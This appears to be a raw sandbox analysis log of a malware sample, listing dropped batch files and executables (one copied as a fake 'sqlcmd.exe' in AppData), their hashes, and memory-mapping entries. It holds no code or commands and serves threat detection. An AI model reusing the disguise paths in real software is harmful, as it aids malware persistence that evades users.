| MD5 | e774e48339bb3205c7d0f4e4c3539a0f |
| SHA1 | c5a0297bc5ccfeee4bab58a5adf415bac0155e63 |
| SHA256 | 2b132ad40aeb3e7f8275c20082157abcd81eba769913e328157ca50ad72d72b7 |
| SHA512 | e4c569e22de23083ea8884baa2a8dd72601f31d791a2801c49c9c41479a3190d3377816e4346f7da00cb1315d5a8d9c83f03dcfbf01e54489d8e23169000c01e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
| MD5 | 3eff1d28a83d7c01ebbd6fdbeeb51b9b |
| SHA1 | 4f34a875b74b9b002ab25fb2a95a18ce94fbb783 |
| SHA256 | 668692f2c0638542a373e6622e97ab2e356a18d3b500a2bc82da133de1b7ac43 |
| SHA512 | 1c64b1895f0d8aaec135e36f99ff95c63193230dd2a361513c6b1a9964630455ebe6c7504e8eb172f83784d6617b5bd5b06ea9d3f898ec2684b996c167710505 |
memory/2524-200-0x0000000000000000-mapping.dmp
memory/2612-201-0x0000000000000000-mapping.dmp
memory/2524-202-0x0000000000810000-0x0000000000811000-memory.dmp
memory/2524-203-0x0000000000870000-0x0000000000871000-memory.dmp
memory/2524-204-0x0000000010580000-0x00000000105F3000-memory.dmp
memory/3176-205-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-206-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-207-0x0000000000400000-0x0000000000405000-memory.dmp
C:\Users\Public\Trast.bat
| MD5 | 4068c9f69fcd8a171c67f81d4a952a54 |
| SHA1 | 4d2536a8c28cdcc17465e20d6693fb9e8e713b36 |
| SHA256 | 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810 |
| SHA512 | a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d |
memory/2920-211-0x0000000000000000-mapping.dmp
memory/3176-213-0x0000000000400000-0x0000000000405000-memory.dmp
memory/3176-210-0x00000000004019E4-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\4zzCjUa1iG.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4020-214-0x0000000000000000-mapping.dmp
C:\Users\Public\UKO.bat
| MD5 | eaf8d967454c3bbddbf2e05a421411f8 |
| SHA1 | 6170880409b24de75c2dc3d56a506fbff7f6622c |
| SHA256 | f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56 |
| SHA512 | fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9 |
memory/1372-216-0x0000000000000000-mapping.dmp
memory/3596-217-0x0000000000000000-mapping.dmp
memory/4000-218-0x0000000000000000-mapping.dmp
memory/2524-219-0x0000000000B90000-0x0000000000C00000-memory.dmp
memory/2524-220-0x0000000000550000-0x0000000000551000-memory.dmp
memory/4008-221-0x0000000000000000-mapping.dmp
C:\Users\Public\nest.bat
| MD5 | 8ada51400b7915de2124baaf75e3414c |
| SHA1 | 1a7b9db12184ab7fd7fce1c383f9670a00adb081 |
| SHA256 | 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7 |
| SHA512 | 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68 |
memory/64-223-0x0000000000000000-mapping.dmp
memory/3728-224-0x0000000005060000-0x00000000050D2000-memory.dmp
memory/3732-226-0x0000000004B50000-0x0000000004BC7000-memory.dmp
memory/1192-225-0x0000000005790000-0x0000000005802000-memory.dmp
memory/3728-228-0x0000000004FF0000-0x0000000005010000-memory.dmp
memory/1192-227-0x0000000005720000-0x000000000573F000-memory.dmp
memory/3732-229-0x00000000055B0000-0x00000000055D6000-memory.dmp
memory/3040-230-0x0000000000400000-0x0000000000408000-memory.dmp
memory/216-231-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3040-232-0x0000000000403BEE-mapping.dmp
memory/216-233-0x000000000040616E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\eRqSXd3z7r.exe
| MD5 | 6439889cfd410e3b57422781c93e26cf |
| SHA1 | 12280091094281fa60fa8321006abfc7c4bd4e33 |
| SHA256 | c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d |
| SHA512 | 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e |
C:\Users\Admin\AppData\Local\Temp\1QL8Pt2Uq1.exe
| MD5 | df5e3ee9a6098d1e29b31603672d5a8f |
| SHA1 | 0af2378effff0a7451317874efe4e6682365c03e |
| SHA256 | fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2 |
| SHA512 | 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9 |
memory/4044-239-0x0000000000000000-mapping.dmp
memory/580-243-0x0000000000000000-mapping.dmp
memory/2288-244-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmpDD03.tmp
| MD5 | bc2b6748d2661e9ce52308b3370f3cd3 |
| SHA1 | 525a293e2aae508e0963f4a4a4c6927f8528e31a |
| SHA256 | 44049739773b479c5cbb04a4bf8371d0d365a7be7c65f765c62a57358f346e82 |
| SHA512 | 568d161df4269764b26ce7c8e1f9ed8a726f6bf7234b8a2b1427ca14c30f90ca789f561a9e815a15940570d542e4baa656c002ff1f4be32dd5c7857b8e576957 |
memory/1484-248-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1484-249-0x000000000040C71E-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\12LA5TJUB3.exe
| MD5 | abeb86fdec0060ffb80f364cabd30b1b |
| SHA1 | 3c9c7b3ee66ff071eb32848ad5a62fab9683427c |
| SHA256 | 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b |
| SHA512 | c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\12LA5TJUB3.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
C:\Windows\temp\i2gwbrqy.inf
| MD5 | f0592949b756677f5e2dedc4089fa849 |
| SHA1 | d2546de183ea26fee3cab283e2e45dbad7493c5b |
| SHA256 | e69805ca130fec7259801b63c3cd3eafec9a4cc6e4d8168c1a55bdab4e7ff96f |
| SHA512 | 1ceabc24a994e665d9ffe797e6ef3b06dac2f11ff9c718c3f50a7b65e0506bd5aea4ac86fc5b9e851c0c36e9912a709d9717e933459d3d23a24c0c18d771de6c |
memory/580-252-0x0000000006A60000-0x0000000006A61000-memory.dmp
memory/580-256-0x00000000068E0000-0x00000000068E1000-memory.dmp
memory/580-257-0x00000000070A0000-0x00000000070A1000-memory.dmp
memory/216-259-0x0000000004D10000-0x000000000520E000-memory.dmp
memory/216-258-0x0000000004D10000-0x000000000520E000-memory.dmp
memory/580-260-0x0000000006A62000-0x0000000006A63000-memory.dmp
memory/580-261-0x0000000006DF0000-0x0000000006DF1000-memory.dmp
memory/580-262-0x0000000006E90000-0x0000000006E91000-memory.dmp
memory/580-263-0x0000000006F00000-0x0000000006F01000-memory.dmp
memory/580-265-0x00000000076D0000-0x00000000076D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1QL8Pt2Uq1.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
memory/2248-267-0x0000000000000000-mapping.dmp
memory/3640-268-0x0000000000000000-mapping.dmp
memory/1484-269-0x0000000005080000-0x0000000005081000-memory.dmp
memory/3640-272-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
C:\Windows\temp\h3gk1fsv.exe
| MD5 | f4b5c1ebf4966256f52c4c4ceae87fb1 |
| SHA1 | ca70ec96d1a65cb2a4cbf4db46042275dc75813b |
| SHA256 | 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03 |
| SHA512 | 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e |
C:\Windows\Temp\h3gk1fsv.exe
| MD5 | f4b5c1ebf4966256f52c4c4ceae87fb1 |
| SHA1 | ca70ec96d1a65cb2a4cbf4db46042275dc75813b |
| SHA256 | 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03 |
| SHA512 | 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e |
memory/2748-274-0x0000000000000000-mapping.dmp
memory/1116-275-0x0000000000000000-mapping.dmp
memory/580-276-0x0000000006AF0000-0x0000000006AF1000-memory.dmp
memory/580-277-0x0000000007CB0000-0x0000000007CB1000-memory.dmp
memory/580-281-0x0000000007D00000-0x0000000007D01000-memory.dmp
memory/2748-284-0x0000028C883D3000-0x0000028C883D5000-memory.dmp
memory/2748-283-0x0000028C883D0000-0x0000028C883D2000-memory.dmp
memory/2748-285-0x0000028CA0910000-0x0000028CA0911000-memory.dmp
memory/2748-288-0x0000028CA0AC0000-0x0000028CA0AC1000-memory.dmp
memory/2748-293-0x0000028C883D6000-0x0000028C883D8000-memory.dmp
memory/580-315-0x00000000089C0000-0x00000000089F3000-memory.dmp
memory/580-331-0x000000007E7B0000-0x000000007E7B1000-memory.dmp
memory/580-333-0x0000000006A63000-0x0000000006A64000-memory.dmp
memory/1468-372-0x0000000000000000-mapping.dmp
memory/2508-377-0x0000000000000000-mapping.dmp
memory/980-382-0x0000000000000000-mapping.dmp
memory/2644-388-0x0000000000000000-mapping.dmp
memory/2024-397-0x0000000000000000-mapping.dmp
memory/3804-404-0x0000000000000000-mapping.dmp
memory/1468-411-0x0000016E61140000-0x0000016E61142000-memory.dmp
memory/4160-413-0x0000000000000000-mapping.dmp
memory/1468-415-0x0000016E61143000-0x0000016E61145000-memory.dmp
memory/980-419-0x000002A2EBA90000-0x000002A2EBA92000-memory.dmp
memory/980-420-0x000002A2EBA93000-0x000002A2EBA95000-memory.dmp
memory/2508-423-0x000002B60B320000-0x000002B60B322000-memory.dmp
memory/2508-426-0x000002B60B323000-0x000002B60B325000-memory.dmp
memory/2644-430-0x0000027051CF0000-0x0000027051CF2000-memory.dmp
memory/2644-433-0x0000027051CF3000-0x0000027051CF5000-memory.dmp
memory/4296-425-0x0000000000000000-mapping.dmp
memory/4432-437-0x0000000000000000-mapping.dmp
memory/2024-451-0x0000016B04640000-0x0000016B04642000-memory.dmp
memory/4160-453-0x000001C8770D0000-0x000001C8770D2000-memory.dmp
memory/2024-455-0x0000016B04643000-0x0000016B04645000-memory.dmp
memory/3804-457-0x0000026C2A770000-0x0000026C2A772000-memory.dmp
memory/3804-458-0x0000026C2A773000-0x0000026C2A775000-memory.dmp
memory/4160-459-0x000001C8770D3000-0x000001C8770D5000-memory.dmp
memory/4296-465-0x000001E07F163000-0x000001E07F165000-memory.dmp
memory/4296-463-0x000001E07F160000-0x000001E07F162000-memory.dmp
memory/4432-476-0x000001636FD00000-0x000001636FD02000-memory.dmp
memory/4432-477-0x000001636FD03000-0x000001636FD05000-memory.dmp
memory/4296-500-0x000001E07F166000-0x000001E07F168000-memory.dmp
memory/4352-511-0x0000000000000000-mapping.dmp
memory/1468-521-0x0000016E61146000-0x0000016E61148000-memory.dmp
memory/2508-524-0x000002B60B326000-0x000002B60B328000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4948-543-0x0000000000000000-mapping.dmp
memory/980-550-0x000002A2EBA96000-0x000002A2EBA98000-memory.dmp
memory/2644-555-0x0000027051CF6000-0x0000027051CF8000-memory.dmp
memory/4352-581-0x000002597B9A0000-0x000002597B9A2000-memory.dmp
memory/2024-589-0x0000016B04646000-0x0000016B04648000-memory.dmp
memory/4352-585-0x000002597B9A3000-0x000002597B9A5000-memory.dmp
memory/4948-619-0x0000016DCC0C0000-0x0000016DCC0C2000-memory.dmp
memory/4948-624-0x0000016DCC0C3000-0x0000016DCC0C5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 7247129cd0644457905b7d6bf17fd078 |
| SHA1 | dbf9139b5a1b72141f170d2eae911bbbe7e128c8 |
| SHA256 | dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4 |
| SHA512 | 9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
| MD5 | 3694ac62d90c1e9f89145f324dc0e204 |
| SHA1 | f2953a9ba829d6fd1e0955dbc95e55abd08234e1 |
| SHA256 | ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9 |
| SHA512 | 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d |
memory/4896-652-0x0000000000000000-mapping.dmp
memory/3804-699-0x00007FF6C0550000-0x00007FF6C0551000-memory.dmp
memory/4896-723-0x0000018ED03B0000-0x0000018ED03B2000-memory.dmp
memory/4896-725-0x0000018ED03B3000-0x0000018ED03B5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c2263b17c6d6cc450042af097ec9637e |
| SHA1 | a1c15c9c8ec782e901b765f30c8e6e128a703b58 |
| SHA256 | a0063db0c47765089745e0600c0afff25d3ed7c4a3072cd28b55e7488c7b1a8e |
| SHA512 | 7b0077eb77f6967b732169618404354b97163d445810accabdbc53f7efb4b1385d6021dad686d6446186ee37464f80d228613455429b2fc122198e0bbbc8c10b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 1a8c542e6d44e65f4be561e6d7013e56 |
| SHA1 | 96476eba76d1a713e9856ce49f060c3dabd00f9e |
| SHA256 | 16b857d9ab9e4ba09f2ebade0aad62a2b28d17dee22b281e2b326d99c57a6762 |
| SHA512 | 0dd7489aacc2ccc952ce1ff69de05cdd7c57fea39c8e29dc31cdd5313101f466610ab98f42c7c2230b3a284dace93230283233fe2cc10830d666633215f56374 |